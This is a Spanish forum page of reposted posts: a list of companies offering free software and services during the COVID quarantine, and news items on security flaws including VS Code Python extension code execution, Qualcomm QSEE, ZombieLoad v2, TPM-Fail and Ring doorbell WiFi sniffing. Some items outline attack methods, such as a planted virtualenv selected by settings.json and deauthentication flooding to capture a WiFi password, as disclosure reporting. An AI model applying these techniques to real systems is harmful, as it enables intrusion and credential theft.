Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - K A I L

Páginas: [1] 2 3 ... 5
1


El confinamiento en cuarentena de la población a causa del coronavirus, y las expectativas de que varios países occidentales pueden moverse en dicha dirección a corto plazo, está motivando cambios en los hábitos diarios de los usuarios, siendo el más notable el aumento del teletrabajo y del consumo de servicios de ocio online.

Para hacer frente a dichos cambios, así como para intentar echar una mano a los usuarios, para que no les suponga un gasto imprevisto difícil de asumir en una situación económica poco propicia, muchas compañías han anunciado iniciativas para que sus productos estén disponibles durante un tiempo de forma gratuita, o bien para que sus productos gratuitos dispongan de funcionalidades extra.


Adobe
El servicio Adobe Creative Cloud, que incluye tanto acceso a su suite de software de diseño gráfico como espacio de almacenamiento de ficheros, será de acceso gratuito hasta el 31 de mayo de 2020 para aquellos usuarios que ya lo estuvieran usando en sus centros educativos y de trabajo. Es decir, esta opción no está abierta a cualquier usuario que desee usar Creative Cloud durante dos meses y medio, sino que está enfocada a facilitar temporalmente el teletrabajo y el seguimiento de clases online.
Citar
"Creemos que al hacerlo será posible mantener el trabajo de los cursos, el trabajo en equipo y el progreso de los estudiantes en el camino a través del acceso en-casa a Creative Cloud para los estudiantes y educadores".
Sí será gratuito, incluso para individuos y organizaciones que son sean clientes de Amazon, el acceso a Adobe Connect, la solución para videoconferencias y webinars de la compañía. Quien se registre para obtener una licencia de prueba antes del 1 de junio podrá, hasta dicha fecha, comunicarse simultáneamente con hasta 25 usuarios.

Avid

Avid, la compañía desarrolladora de software de edición multimedia como Media Composer, Sibelius y Pro Tools, también ofrece licencias temporales gratuitas hasta el 17 de abril, que permitirán el uso gratuito de sus herramientas durante 90 días. De nuevo, como en el caso de Adobe Creative Cloud, será para aquellas personas que ya estuvieran usando dicho software en sus empresas e instituciones educativas.

Cisco
Otro software de videoconferencias, Webex, de Cisco, también está ofreciendo licencias gratuitas de 90 días a empresas, incluyendo en este caso a las que no venían pagando anteriormente por el uso de esta herramienta, que admite hasta 100 usuarios por videoconferencia (y disponibilidad de acceso telefónico a las mismas).

Cloudflare
Cloudflare, uno de los grandes proveedores de ciberseguridad e infraestructuras web, ha decidido suprimir las limitaciones de las licencias de prueba de sus productos Cloudflare Access (VPN) y Cloudflare Gateway (cortafuegos) durante los próximos seis meses.
La semana pasada anunció que esa opción estaría disponible sólo para pequeñas empresas, pero días después anunció que se lo habían pensado mejor y que la pondrían a disposición de todos los clientes con independencia de su tamaño.


Coursera

La plataforma de MOOCs Coursera, uno de los mayores repositorios de cursos online de la Red, ha habilitado un portal específico para que las universidades aprovechen la crisis del coronavirus para registrarse y permitir a hasta 5.000 sus estudiantes tener acceso gratuito a un catálogo de 3.800 cursos y 400 especializaciones.
Los centros tienen hasta el 31 de julio para registrarse, pero los estudiantes participantes podrán completar los cursos que elijan hasta el 30 de septimbre de este año.


Discord
El servicio de transmisión de vídeo en streaming de Discord, Go Live, permitía hasta ahora compartir la vista de sus juegos y aplicaciones con 10 usuarios simultáneos de manera gratuita. A partir de ahora, sin embargo, ese límite se multiplicará por 5, hasta los 50 usuarios.
Esta oferta de Discord, destinada a que "los maestros puedan seguir impartiendo clase, los compañeros de trabajo puedan seguir colaborando y los grupos sigan reuniéndose" carece de una fecha máxima pre-establecida, pero será "temporal" en cualquier caso.


FlixOlé
FlixOlé es un competidor humilde de Netflix, centrado en el cine patrio y en las películas de videoclub (aquí puedes ver algunos ejemplos de su catálogo de más de 3.000 películas). Incluso si no eres consumidor preferente de esa clase de cine, es posible que eches un vistazo a la plataforma ahora que ofrecen un mes de acceso gratuito si te registras usando el código 'YOMEQUEDO'.

Google
La compañía del buscador ha anunciado que aquellos que ya sean clientes de sus productos G Suite y G Suite for Education, tendrán desde ahora acceso gratuito a sus funciones de videoconferencia de Hangouts Meet (hasta ahora esta herramienta sólo estaba incluida en la versión Enterprise de la aplicación).
Esto supone acceso a videoconferencias de hasta 250 usuarios participantes, streaming en vivo para hasta 100.000 espectadores dentro de un dominio determinado, y la opción de grabar las videoconferencias y subirlas automáticamente a Google Drive.

Citar
"Estamos comprometidos a apoyar a nuestros usuarios y clientes durante este momento difícil, y continuamos escalando nuestra infraestructura para soportar una mayor demanda de Hangouts Meet, asegurando un acceso al mismo ágil y fiable durante este período".

Kiosko y Más
Kiosko y Más es una plataforma que nos permite suscribirnos a la versión digitalizada de una amplia gama de los periódicos y revistas que podemos ver cada día en los kioscos físicos. Una de las empresas integradas en dicha plataforma, el Grupo Hearst (que edita en España revistas como ELLE, Fotogramas, SuperTele, Car & Drivery otras 15 más) ha anunciado que el acceso a sus publicaciones disponibles en Kiosko y Más será gratuito hasta el próximo día 1 de abril.

Korg / Moog
Korg y Moog son dos empresas distintas, pero con algo en común: ambas desarrollan aplicaciones móviles de sintetización musical, populares entre los músicos, y ambas han anunciado su disponibilidad gratuita por tiempo limitado.
Minimoog Model D, de Moog, está disponible para dispositivos iOS y será gratuita por un tiempo no revelado aún; mientras que Kaossilator, de Korg, lo estará hasta el día 20 (si eres usuario de Android) y hasta el día 31 (si lo eres de iOS).


Lingokids
Lingokids, una startup española especializada en la enseñanza de inglés a niños de entre 2 y 8 años, anunció el pasado viernes que pondría a disposición de 1.000 colegios españoles de Infantil y Primaria licencias gratuitas de su aplicación móvil para que sus alumnos pudieran dar continuidad a sus estudios de inglés en medio de la cuarentena.

Loom
Loom, un software de grabación de vídeo, ha anunciado que eliminará los límites de grabación de su plan gratuito, que rebajará un 50% el precio de su versión Pro (y extenderá de 30 a 60 días su período de prueba). Todo ello hasta el 1 de julio, cuando se estima que haya finalizado en EE.UU. la crisis del coronavirus:
Citar
"Si bien Loom es utilizado diariamente por todo tipo de personas y equipos, no sólo de forma remota y distribuida, nuestro producto es particularmente útil aquellos que, por cualquier razón, no pueden estar en la misma habitación".

Microsoft
Microsoft Teams, la herramienta de Microsoft integrada en Office 365 y destinada a permitir el trabajo colaborativo, ofrece licencias gratuitas hasta el 1 de enero de 2021 que suprimen las restricciones del número de usuarios que la versión freemium mantenía hasta ahora.

Movistar
Movistar+ Lite es un servicio online para no clientes de la operadora que permite el acceso a series originales de Movistar Plus, deporte y películas. Hasta hace unos días, tras el mes de prueba gratis de la plataforma había que pagar, pero tras el comienzo de la cuarentena, Movistar ofrece un mes gratis para todos, fueran ya clientes del servicio (se ahorran una cuota) o no (pudiendo incluso disfrutar d eotro mes de prueba si ya lo hubiera hecho).

Pornhub

Pornhub es la mayor plataforma de pornografía online a nivel mundial, y su última decisión empresarial ha logrado que hasta los medios generalistas hablen de ella: ha decidido dar acceso gratuito a su contenido premium de pago a los usuarios en cuarentena en Italia y España. Dicho acceso no requiere de ninguna clase de registro de usuario, es automático en base a la IP de origen del usuario.

Zoho
Zoho Remotely, la suite web de software ofimático y de trabajo remoto de equipos de Zoho, será de acceso gratuito hasta el 1 de julio de este año.

Freepik Company
La empresa malagueña Freepik Company, que gestiona los portales Freepik (de fotografías e ilustraciones), Flaticon (de iconos) y Slidesgo (de presentaciones) ha puesto en marcha su iniciativa "Dando Apoyo frente a Covid-19", consistente en dos medidas:
  • Crear cientos de recursos gráficos específicos sobre el coronavirus y ponerlos a disposición de cualquier usuario de manera gratuita en las 3 webs: Freepik, Flaticon y Slidesgo.
  • Habilitar cuentas Premium en Freepik y Flaticon de manera gratuita y por 3 meses a los profesionales de la educación, sanidad, medios de comunicación e instituciones públicas que lo soliciten.
Citar
"Sabemos que nuestros recursos gráficos son más útiles que nunca en estos momentos y este es el motivo por el que regalamos el acceso Premium a los profesionales que necesitan desarrollar su labor de formación e información".

Sports Interactive / SEGA

Sports Interactive y SEGA han anunciado que la versión para PC y Mac de su videojuego Football Manager 2020, que nos permite dirigir todos los aspectos de un equipo de fútbol de nuestra elección, estará disponible de manera gratuita hasta la madrugada del miércoles 25 de marzo en la plataforma Steam. Tras ese momento, los usuarios que quieran seguir jugando deberán adquirirlo a su precio habitual (54,99€).

Rakuten TV
La plataforma Rakuten TV ha anunciado que amplía el contenido disponible en su sección FREE, ofreciendo más de 100 películas a coste cero. En dicha sección los usuarios podrán encontrar canales gratuitos entre los que destacan grandes largometrajes de Hollywood en el canal Películas; el canal infantil Kids; y Rakuten Stories, canal que aglomera producciones originales y exclusivas de Rakuten TV, varias de ellas vinculadas al mundo del deporte.

Hootsuite
Hootsuite, la aplicación web y móvil destinada a la gestión de múltiples perfiles sociales, ha anunciado que ofrecerá, hasta el próximo 1 de julio, acceso gratuito a su Plan Profesional a organizaciones sin ánimo de lucro y a PYMES ("que en muchos casos están siendo las más afectadas por la crisis del COVID-19"), que podrán solicitarlo en este enlace.
Además, la compañía también ofrecerá una serie de cursos gratuitos online para apoyar a las empresas de atención sanitaria, servicios financieros, educación superior y organizaciones gubernamentales.


Scribd
Scribd es un gran repositorio de documentos (con más de un millón de libros, y audiolibros, amén de artículos, revistas, etc) que funciona bajo una modalidad de suscripción que proporciona a sus usuarios lecturas ilimitadas. Pero, durante 30 días, será posible registrarse (a través de este enlace) y acceder gratuitamente y sin compromiso de permanencia, a todo el contenido de la plataforma.
Citar
"Nuestra meta es simplemente asegurarnos de que todos tengan acceso a sus libros favoritos, autores y contenido de calidad, mientras todo vuelve a la normalidad en las próximas semanas".

Learnfit
Learnfit es un proyecto de una startup madrileña (Alumne, especializada en tecnología educativa), que ha decidido darnos acceso gratuito, durante 45 días, a 95 cursos de diferentes temáticas, que destacan pos proporcionarnos un 'coach' virtual basado en IA para animarnos a superar retos de aprendizaje.

Affinity
La compañía de software de diseño gráfico Affinity también ofrece su propia iniciativa solidaria para con los usuarios que sufren los efectos de las cuarentenas: 90 días de prueba gratuita para las versiones Mac y Windows de toda su suite Affinity (aquí) y descuento del 50% en caso de decidir adquirirlo. Además, prometen invertir el equivalente a su presupuesto anual contratando 100 creativos en los próximos meses.

FUENTE
Muchas gracias a todas ellas por esta iniciativa y aportar en estos tiempos difíciles.

2


El equipo de Doyensec ha encontrado una vulnerabilidad en la popular extensión para Python de Visual Studio Code que permitiría la ejecución remota de código.

La extensión de Python, con aproximadamente 16.5 millones de instalaciones, cuenta con un fallo de diseño que permite ejecutar el código encontrado en el ‘virtualenv‘ de un proyecto sin notificar al usuario. Este comportamiento es utilizado para tareas como reestructuración de código, autocompletado, etcétera. Sin embargo, el diseño inseguro de esta extensión permitiría a un atacante ejecutar código arbitrario en el sistema de una víctima que clone un repositorio malicioso basado en Python.

En una de sus auditorías a una aplicación web basada en Python, un ingeniero de Doyensec se dio cuenta de que Visual Studio había seleccionado automaticamente el ‘virtualenv‘ del proyecto que estaba auditando y que estaba tratando de ejecutar el componente ‘pylint‘ sin ningún tipo de confirmación del usuario. Esto le hizo sospechar que sería posible una ejecución de código: procedió a añadir la línea os.exec(«/Applications/Calculator.app») en el código fuente del componente ‘pylint‘ y tras instalar el componente y forzar su ejecución abriendo un fichero de tipo Python, la calculadora del sistema se abrió y sus sospechas se confirmaron.

Bastaría con crear un proyecto con un fichero ‘settings.json’ que seleccionase el entorno malicioso por defecto para poder explotar la vulnerabilidad cuando la víctima clone y abra alguno de los ficheros del proyecto.

Doyensec ha publicado una prueba de concepto en su repositorio de Github que ejecuta la calculadora de macOS:

  • Primero hay que clonar el proyecto: git clone [email protected]:doyensec/VSCode_PoC_Oct2019.git
  • Añadirlo al entorno de trabajo de Visual Studio
  • Abrir el fichero test.py desde Visual Studio

Este repositorio contiene un fichero ‘settings.json’ «malicioso» que selecciona el ‘virtualenv‘ situado en la carpeta ‘totally_innocuous_folder/no_seriously_nothing_to_see_here’.



La extensión vulnerable no está instalada por defecto y el fallo ya ha sido revelado de forma responsable a sus desarrolladores quienes han estimado que estará resuelto a mediados de abril de 2020.

Más información:
Tweak settings to prevent accidental execution of code from within a workspace. Issue #7805

FUENTE

3

Millones de dispositivos, especialmente teléfonos inteligentes y tablets con Android, que utilizan conjuntos de chips Qualcomm, son vulnerables a un nuevo conjunto de vulnerabilidades potencialmente graves.

Según un informe de la firma de ciberseguridad CheckPoint, las vulnerabilidades podrían permitir a los atacantes robar datos confidenciales almacenados en un área segura que, de lo contrario, se supone que es la parte más protegida de un dispositivo móvil.

Las vulnerabilidades residen en el Entorno de ejecución segura (QSEE) de Qualcomm, una implementación del Entorno de ejecución confiable (TEE) basado en la tecnología ARM TrustZone.

También conocido como Qualcomm's Secure World, QSEE es un área segura aislada por hardware en el procesador principal que tiene como objetivo proteger la información confidencial y proporciona un entorno seguro (REE) separado para ejecutar aplicaciones de confianza.

Junto con otra información personal, QSEE generalmente contiene claves de cifrado privadas, contraseñas, credenciales de tarjetas de crédito y débito.

Dado que se basa en el principio del privilegio mínimo, los módulos del sistema Normal World, como los controladores y las aplicaciones, no pueden acceder a las áreas protegidas a menos que sea necesario, incluso cuando tienen permisos de root.

"En un proyecto de investigación de 4 meses, logramos revertir el sistema operativo Secure World de Qualcomm y aprovechamos la técnica de fuzzing para exponer el agujero", dijeron los investigadores.

"Implementamos una herramienta de fuzzing hecha a medida, que probó el código confiable en dispositivos Samsung, LG y Motorola", que permitió a los investigadores encontrar cuatro vulnerabilidades en el código confiable implementado por Samsung, uno en Motorola y otro en LG.

  • dxhdcp2 (LVE-SMP-190005)
  • sec_store (SVE-2019-13952)
  • authnr (SVE-2019-13949)
  • esecomm (SVE-2019-13950)
  • kmota (CVE-2019-10574)
  • tzpr25 (reconocido por Samsung)
  • prov (Motorola está trabajando en una solución)


Según los investigadores, las vulnerabilidades reportadas en los componentes seguros de Qualcomm podrían permitir que un atacante:
  • ejecutar aplicaciones confiables en el mundo normal (sistema operativo Android),
  • cargar aplicaciones confiables parcheadas en Secure World (QSEE),
  • sin pasar por la cadena de confianza de Qualcomm,
  • adaptar la aplicación de confianza para ejecutarla en un dispositivo de otro fabricante,
  • y más.

"Un hecho interesante es que también podemos cargar trustlets desde otro dispositivo. Todo lo que tenemos que hacer es reemplazar la tabla hash, la firma y la cadena de certificados en el archivo .mdt del trustlet con los extraídos del trustlet del fabricante del dispositivo". Dijeron los investigadores .

En resumen, una vulnerabilidad en el componente TEE deja a los dispositivos vulnerables a una amplia gama de amenazas de seguridad, incluida la fuga de datos protegidos, el rooting de dispositivos, el desbloqueo del cargador de arranque y la ejecución de APT indetectable.

Las vulnerabilidades también afectan a una amplia gama de teléfonos inteligentes y dispositivos IoT que usan el componente QSEE para proteger la información confidencial de los usuarios.

Check Point Research divulgó responsablemente sus hallazgos a todos los proveedores afectados, de los cuales Samsung, Qualcomm y LG ya han lanzado una actualización de parche para estas vulnerabilidades QSEE.

FUENTE

4
Zombieload está de vuelta.

Esta vez, una nueva variante (v2) de la vulnerabilidad de fuga de datos en el canal lateral también afecta a las CPU Intel más recientes, incluida la última Cascade Lake, que de otro modo es resistente a ataques como Meltdown, Foreshadow y otras variantes de MDS (RIDL y Fallout) .

Inicialmente descubierto en mayo de este año, ZombieLoad es uno de los tres tipos nuevos de vulnerabilidades de ejecución especulativa de muestreo de datos de microarquitectura (MDS) que afectan a las generaciones de procesadores Intel lanzadas a partir de 2011.

La primera variante de ZombieLoad es un ataque de tipo Meltdown que se dirige a la lógica del relleno de búfer que permite a los atacantes robar datos confidenciales no solo de otras aplicaciones y del sistema operativo, sino también de máquinas virtuales que se ejecutan en la nube con hardware común.

ZombieLoad v2 afecta las últimas CPU Intel

Ahora, el mismo grupo de investigadores ha revelado detalles de una segunda variante de la vulnerabilidad, denominada ZombieLoad v2 y rastreada como CVE-2019-11135, que reside en las Extensiones de sincronización transaccional (TSX) de Intel.

Intel TSX proporciona soporte de memoria transaccional en hardware, con el objetivo de mejorar el rendimiento de la CPU al acelerar la ejecución de software de subprocesos múltiples y anular una transacción cuando se encuentra un conflicto de acceso a la memoria.


Intel se ha referido a la vulnerabilidad ZombieLoad v2 como "Anulación asincrónica (TAA) de las Extensiones de sincronización transaccional (TSX)" porque la explotación de esta falla requiere un atacante local, con la capacidad de monitorear el tiempo de ejecución de las regiones TSX, para inferir el estado de la memoria al comparar los tiempos de la anulación de ejecución.

ZombieLoad v2 afecta a computadoras de escritorio, computadoras portátiles y computadoras en la nube que ejecutan cualquier CPU Intel que admita TSX, incluidos los procesadores Core, Xeon y Cascade Lake, la línea de CPU de gama alta de Intel que se introdujo en abril de 2019.

Parches de microcódigo disponibles para ZombieLoad v2

Los investigadores advirtieron a Intel sobre ZombieLoad Variant 2 el 23 de abril, al mismo tiempo que descubrieron e informaron sobre las otras fallas de MDS que el fabricante de chips solucionó un mes más tarde en mayo.

El 10 de mayo, el equipo también informó a Intel que el ataque ZombieLoad Variant 2 funciona contra las nuevas líneas de CPU de la compañía, incluso cuando incluyen mitigaciones de hardware contra ataques MDS.

Intel pidió a los investigadores que no revelaran los detalles de la Variante 2 hasta ahora cuando el fabricante de chips presentó parches de seguridad con una actualización de microcódigo que aborda esta vulnerabilidad.

La compañía también ha proporcionado mitigaciones MDS para desarrolladores de sistemas operativos, desarrolladores de máquinas virtuales (VMM), desarrolladores de software que utilizan Intel SGX y administradores de sistemas.

Para obtener más detalles sobre la nueva variante ZombieLoad, puede dirigirse al documento de investigación original publicado por los investigadores en mayo, que ahora se ha actualizado para agregar también información sobre la segunda variante.

Mientras tanto, Red Hat también ha lanzado una secuencia de comandos con la que los usuarios pueden detectar si su sistema impulsado por Intel también es vulnerable a esta falla.

FUENTE

5

Mozilla, Fastly, Intel y Red Hat se han unido para desarrollar tecnologías que hacen de WebAssembly una plataforma universal para ejecutar código de forma segura en cualquier infraestructura, sistema operativo y dispositivo. Para el desarrollo conjunto del runtime y compiladores, que permite utilizar WebAssembly no solo en navegadores web, se ha formado la comunidad Bytecode Alliance.

Para crear programas portables entregados en formato WebAssembly que puedan ejecutarse fuera del navegador, se propone utilizar la API WASI (Interfaz del sistema WebAssembly), que proporciona interfaces de programas para la interacción directa con el sistema operativo (API POSIX para trabajar con archivos, sockets, etc.).

Una característica distintiva del modelo de ejecución de aplicaciones que utilizan WASI es el lanzamiento en un entorno de espacio aislado para aislar del sistema principal y el uso de un mecanismo de seguridad basado en la gestión de capacidades, para acciones con cada uno de los recursos (archivos, directorios, sockets, llamadas al sistema, etc.) la aplicación debe tener la autorización correspondiente (solo se proporciona acceso a la funcionalidad declarada).

Uno de los objetivos de la alianza creada es resolver el problema de la difusión de las aplicaciones modulares modernas con una gran cantidad de dependencias. En tales aplicaciones, cada dependencia puede ser una fuente potencial de vulnerabilidades o ataques. Obtener el control de dependencia le permite obtener el control sobre todas las aplicaciones asociadas con él.

Los miembros de Bytecode Alliance tienen la intención de preparar una solución completa para la ejecución segura de aplicaciones WebAssembly que inicialmente no son confiables.

Para la protección, se propone utilizar el concepto de nanoprocesos, en el que cada módulo de dependencia se separa en un módulo WebAssembly aislado por separado, cuya autoridad está configurada para vincularse solo a este módulo (por ejemplo, una biblioteca para procesar cadenas no puede abrir un socket o archivo de red).

A diferencia de la separación de procesos, los manejadores de WebAssembly son livianos y casi no requieren recursos adicionales ademas de que la interacción entre los manejadores no es mucho más lenta que llamar a funciones ordinarias.

Para el desarrollo conjunto, varios proyectos relacionados con WebAssembly, previamente desarrollados por separado por las compañías fundadoras de la alianza, se transfirieron bajo el ala de Bytecode Alliance:

  • Wasmtime: Un runtime para ejecutar aplicaciones WebAssembly con extensiones WASI como aplicaciones independientes regulares. Admite el lanzamiento del código de bytes de WebAssembly utilizando una utilidad especial de línea de comandos y el diseño de archivos ejecutables listos para usar (wasmtime está integrado en la aplicación como una biblioteca).
  • Lucet: es un compilador y un runtime para ejecutar programas en formato WebAssembly. Una característica distintiva de Lucet es el uso de una compilación preventiva completa (AOT, por adelantado) en el código de máquina adecuado para la ejecución directa en lugar de JIT. El proyecto fue desarrollado por Fastly y optimizado para consumir recursos mínimos y lanzar rápidamente nuevas instancia.Como parte de un proyecto conjunto, se planea cambiar el compilador Lucet para usar Wasmtime como base.
  • WAMR (WebAssembly Micro Runtime): es otro runtime para ejecutar WebAssembly, desarrollado originalmente por Intel para su uso en dispositivos IoT. WAMR está optimizado para un consumo mínimo de recursos y se puede usar en dispositivos con una pequeña cantidad de RAM. El proyecto incluye un intérprete y una máquina virtual para ejecutar el código de bytes de WebAssembly, una API (un subconjunto de Libc) y herramientas para administrar aplicaciones dinámicamente.
  • Cranelift: es un generador de código que traduce una representación intermedia independiente del hardware en código máquina ejecutable optimizado para plataformas de hardware específicas. Cranelift admite la paralelización de la compilación de funciones para una generación muy rápida de resultados, lo que le permite usarlo para crear compiladores JIT (JIT basado en Cranelift se usa en la máquina virtual Wasmtime).
  • WASI: una implementación independiente de la API WASI (Interfaz de sistema de ensamblaje web) para organizar la interacción con el sistema operativo.
  • cargo-wasi: un módulo para el administrador de paquetes cargo que implementa un comando para compilar código Rust en el código de bytes de WebAssembly utilizando la interfaz WASI para usar WebAssembly fuera del navegador.
  • wat y wasmparser: son analizadores para analizar texto (WAT, WAST) y representaciones binarias del código de bytes de WebAssembly.

FUENTE

6

Un equipo de investigadores de ciberseguridad reveló hoy detalles de dos nuevas vulnerabilidades de CPU potencialmente graves que podrían permitir a los atacantes recuperar claves criptográficas protegidas dentro de chips TPM fabricados por STMicroelectronics o Intel TPM basados ​​en firmware.

Trusted Platform Module (TPM) es una solución de seguridad especializada basada en hardware o firmware que ha sido diseñada para almacenar y proteger información confidencial de los atacantes incluso cuando su sistema operativo se ve comprometido.

La tecnología TMP está siendo utilizada ampliamente por miles de millones de computadoras de escritorio, computadoras portátiles, servidores, teléfonos inteligentes e incluso por dispositivos de Internet de las cosas (IoT) para proteger claves de cifrado, contraseñas y certificados digitales.

Denominados colectivamente como TPM-Fail, ambas vulnerabilidades recientemente encontradas, como se enumeran a continuación, aprovechan un ataque de canal lateral basado en el tiempo para recuperar claves criptográficas que, de lo contrario, se supone que permanecerían de forma segura dentro de los chips.


Según los investigadores, las operaciones de firma de curva elíptica en TPM de varios fabricantes son vulnerables a problemas de fuga de tiempo, lo que podría conducir a la recuperación de una clave privada al medir el tiempo de ejecución de la operación dentro del dispositivo TPM.

"Un adversario privilegiado puede explotar el núcleo del sistema operativo para realizar una medición precisa del tiempo del TPM, y así descubrir y explotar las vulnerabilidades del tiempo en las implementaciones criptográficas que se ejecutan dentro del TPM".

"Son [ataques] prácticos. Un adversario local puede recuperar la clave ECDSA de Intel fTPM en 4-20 minutos, dependiendo del nivel de acceso".


Como prueba de concepto (código en GitHub), los investigadores probaron y lograron recuperar claves privadas ECDSA y ECSchnorr de 256 bits mediante la recopilación de datos de temporización de firma, con y sin privilegios administrativos.

"Además, logramos recuperar las claves de ECDSA de un servidor dotado de fTPM que ejecuta StrongSwan VPN en una red ruidosa según lo medido por un cliente".

"En este ataque, el cliente remoto recupera la clave de autenticación privada del servidor sincronizando solo 45,000 handshakes de autenticación a través de una conexión de red".

"El hecho de que un ataque remoto pueda extraer claves de un dispositivo TPM certificado como seguro contra fugas de canal lateral subraya la necesidad de re-evaluar ataques remotos en implementaciones criptográficas".


Una vez recuperado, un atacante puede usar claves robadas para falsificar firmas digitales, robar o alterar información encriptada, y eludir las características de seguridad del sistema operativo o comprometer las aplicaciones que dependen de la integridad de las claves.

"El vulnerable Intel fTPM es utilizado por muchos fabricantes de PC y portátiles, incluidos Lenovo, Dell y HP".

Además de esto, los investigadores también probaron soluciones TMP fabricadas por Infineon y Nuvoton y las encontraron vulnerables a problemas de fuga de tiempo de ejecución no constante.

Los investigadores informaron de manera responsable sus hallazgos a Intel y STMicroelectronics en febrero de este año, y las compañías publicaron ayer una actualización de parche para los productos afectados.

Prueba de concepto (código en GitHub)
FUENTE

7

Hace algunos días Google presentó un nuevo proyecto abierto, el cual tiene como nombre “OpenTitan” y que describe como una plataforma para crear componentes de hardware confiables (RoT, Root of Trust). OpenTitan se basa en tecnologías ya utilizadas en tokens USB criptográficos Google Titan y chips TPM para proporcionar descargas verificadas instaladas en servidores en la infraestructura de Google, así como en dispositivos Chromebook y Pixel.

G + D Mobile Security, Nuvoton Technology y Western Digital ya se han unido a la colaboración en OpenTitan, así como en la Escuela Técnica Superior de Zurich y la Universidad de Cambridge, cuyos investigadores están desarrollando la arquitectura de procesador segura CHERI (Capability Hardware Enhanced RISC Instrucciones) y recientemente recibieron una subvención en 190 millones de euros para adaptar tecnologías relacionadas con procesadores ARM y crear prototipos de la nueva plataforma de hardware Morello.

El objetivo de la nueva coalición es crear diseños de chips confiables para su uso en centros de datos, almacenamiento y periféricos informáticos, que sean abiertos y transparentes, lo que permite a cualquiera inspeccionar el hardware en busca de vulnerabilidades de seguridad y backdoors.

Sobre OpenTitan

A diferencia de las implementaciones existentes de Root of Trust, el nuevo proyecto se está desarrollando de acuerdo con el concepto de “seguridad a través de la transparencia”, lo que implica un proceso de desarrollo completamente abierto y la disponibilidad de código y esquemas.

Código: [Seleccionar]
Root of Trust (RoT) es una fuente en la que siempre se puede confiar dentro de un sistema criptográfico
OpenTitan se puede utilizar como un marco listo, probado y confiable que le permite aumentar la confianza en las soluciones creadas y reducir los costos al desarrollar chips especializados para la seguridad. OpenTitan se desarrollará en una plataforma independiente como un proyecto conjunto, no vinculado a proveedores y fabricantes de chips específicos.

Cita de: Dominic Rizzo, líder de Google OpenTitan
“Cuando Google vio inicialmente la necesidad de la industria de un diseño de referencia de código abierto, sabíamos que requeriría un administrador externo maduro como lowRISC para fomentar un proyecto de código abierto de este tipo para la comunidad”

OpenTitan será supervisado por la organización sin fines de lucro lowRISC, que está desarrollando un microprocesador gratuito basado en la arquitectura RISC-V.

El proyecto OpenTitan cubre el desarrollo de varios componentes lógicos que se demandan en los chips RoT, incluido el microprocesador abierto lowRISC Ibex basado en la arquitectura RISC-V, coprocesadores criptográficos, un generador de números aleatorios de hardware, una jerarquía de almacenamiento de claves y datos en memoria de acceso constante y aleatorio, mecanismos de protección, bloques de entrada E / S, medios de arranque seguro, etc.

OpenTitan se puede usar donde sea necesario para garantizar la integridad de los componentes de hardware y software del sistema, asegurando que los componentes críticos del sistema no hayan sido reemplazados y estén basados en un código verificado y autorizado por el fabricante.

Los chips basados en OpenTitan se pueden usar en placas base de servidor, tarjetas de red, dispositivos de consumo, enrutadores, dispositivos de Internet de las cosas para verificar el firmware (detectar modificaciones de firmware por malware), proporcionar un identificador de sistema criptográficamente único (protección contra falsificación de hardware) y proteger claves criptográficas (aislamiento claves en el caso de que un atacante obtenga acceso físico a los equipos), proporcione servicios relacionados con la seguridad y mantenga un registro aislado una auditoría que no se puede editar ni eliminar.

Los ingenieros de OpenTitan están construyendo actualmente el diseño lógico de un RoT de silicio. Hasta ahora, eso incluye un microprocesador de código abierto (lowRISC Ibex, un diseño basado en RISC-V), coprocesadores criptográficos, un generador de números aleatorios de hardware, una sofisticada jerarquía de claves, jerarquías de memoria para almacenamiento volátil y no volátil, mecanismos de defensa, IO periféricos, arranque seguro y más.

Puedes ver el progreso en GitHub ya que el código relacionado con el proyecto y las especificaciones de hardware se publican en GitHub bajo la licencia Apache 2.0.

FUENTE

8
Noticias Informáticas / Hosting SmarterASP.NET atacado con un ransomware
« en: Noviembre 12, 2019, 10:33:29 am »

El servicio de hosting SmarterASP.NET sufría el pasado 9 de noviembre un ataque por ransomware que ha dejado sin servicio total o parcialmente a unos 440.000 clientes.

La compañía ha reconocido en un comunicado oficial el ataque y ha informado a sus usuarios que se está llevando a cabo la restauración progresiva de sus cuentas.

Por lo que han podido comprobar algunos de los usuarios que han conseguido acceder a su cuenta, sus ficheros se encontraban cifrados y con la extensión «.kjhbx».


Un usuario compartía en Twitter la nota de rescate:


Por la nota, puede tratarse de una versión de Snatch. Aunque se desconocen más detalles sobre el ataque ni cuál fue el vector de entrada.

SmarterASP.NET se une a la lista de empresas de hosting golpeadas por un ransomware. A lo largo de este año, compañías como A2 y iNSYNQ se han visto afectadas por esta amenaza.

Por el momento no existe ninguna forma de descifrar los archivos cifrados por Snatch. No sabemos si la compañía ha optado por pagar el rescate o está utilizando copias de seguridad para restaurar sus sistemas.

FUENTE

9

Investigadores de seguridad de Bitdefender han descubierto una brecha de seguridad en el videoportero de Amazon «Ring Video Doorbell Pro» que podría permitir a los atacantes robar la contraseña del Wifi de nuestros hogares y, posteriormente, lanzar ataques del tipo Man in the Middle (MitM) contra otros dispositivos conectados a la misma red.

Para los que no hayan escuchado hablar sobre Ring, es un videportero que nos permite interactuar con cualquier persona desde cualquier parte del mundo. El timbre tiene que estar conectado a nuestra red Wifi, lo que nos permitiría acceder al dispositivo desde una aplicación móvil.

Cuando estamos configurando el timbre debemos ponerlo en modo <<Configuración>>, lo cual activa un punto de acceso inalámbrico que lleva el dispositivo incorporado y que carece de cualquier tipo de protección. Esto permite que la aplicación móvil se conecte de forma automática al timbre.

Además, los investigadores descubrieron que al establecer la conexión inicial entre el timbre y la aplicación móvil, momento en el que se comparte la clave Wifi, ésta se hace mediante HTTP.


Este tipo de ataque solo es posible realizarlo durante la configuración inicial del dispositivo, pero… ¿cómo podría un atacante aprovecharlo?

Los investigadores sugirieron que, al enviar de forma constante mensajes de desautorización para hacer que el dispositivo se caiga de la red, éste envía al usuario una sugerencia para que vuelva a configurarlo. El botón de visualización en vivo se vuelve gris y, al pulsarlo, se mostrará una notificación para que el usuario reinicie el router o pulse dos veces el botón de configuración del dispositivo. Una vez pulsado dos veces seguidas se intentará volver a conectar a la red, pero ese intento fallará, por lo que solo nos quedaría reconfigurar el dispositivo.

Una vez que el propietario acceda al modo configuración para ingresar la clave Wifi, el atacante que «esnifee» el tráfico capturará la contraseña en texto plano, como se muestra en la imagen.


Bitdefender reportó el fallo encontrado en el dispositivo ‘Ring Video Doorbell Pro’ en junio de este año e informó a Amazon. Después de cierta comunicación con el proveedor, el 5 de septiembre se lanzó una actualización para corregir la vulnerabilidad.

FUENTE

